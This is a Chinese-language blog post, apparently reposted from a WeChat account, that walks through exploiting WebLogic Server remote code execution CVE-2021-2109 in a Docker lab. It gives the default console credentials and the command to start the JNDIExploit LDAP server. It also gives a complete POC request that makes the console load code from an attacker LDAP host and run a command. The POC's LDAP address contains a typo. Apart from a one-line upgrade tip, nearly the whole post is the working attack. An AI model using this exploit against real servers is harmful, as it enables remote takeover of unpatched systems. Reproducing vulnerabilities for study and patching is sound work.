Weblogic Server远程代码执行(CVE-2021-2109 )复现

  • A+
所属分类:安全文章

影响版本


WebLogic 10.3.6.0.0WebLogic 12.1.3.0.0WebLogic 12.2.1.3.0WebLogic 12.2.1.4.0WebLogic 14.1.1.0.0


环境搭建

 

这里使用docker来搭建环境

docker pull ismaleiva90/weblogic12


Weblogic Server远程代码执行(CVE-2021-2109 )复现

docker run -d -p 49163:7001 -p 49164:7002 -p 49165:5556 ismaleiva90/weblogic12:latest

Weblogic Server远程代码执行(CVE-2021-2109 )复现

访问http://your-ip:49163/console即可看到页面

Weblogic Server远程代码执行(CVE-2021-2109 )复现

User: weblogicPass: welcome1


登陆进去

Weblogic Server远程代码执行(CVE-2021-2109 )复现


漏洞复现

 

启动LDAP

下载地址:

https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11


java -jar JNDIExploit-v1.11.jar -i 192.168.204.131


Weblogic Server远程代码执行(CVE-2021-2109 )复现

POC:

POST /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.204;131:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1
Host: 192.168.204.131:49163
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
cmd:id
Cookie: ADMINCONSOLESESSION=nM8lXW3nshhqyFuWs47qjIiQP0tUMtRYRHbBUFDXA8QIxRpdyNqr!964275826
Upgrade-Insecure-Requests: 1

构建数据包并发送

Weblogic Server远程代码执行(CVE-2021-2109 )复现

成功执行命令

 

修复建议

 

升级到安全版本


本文始发于微信公众号(锋刃科技):Weblogic Server远程代码执行(CVE-2021-2109 )复现

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: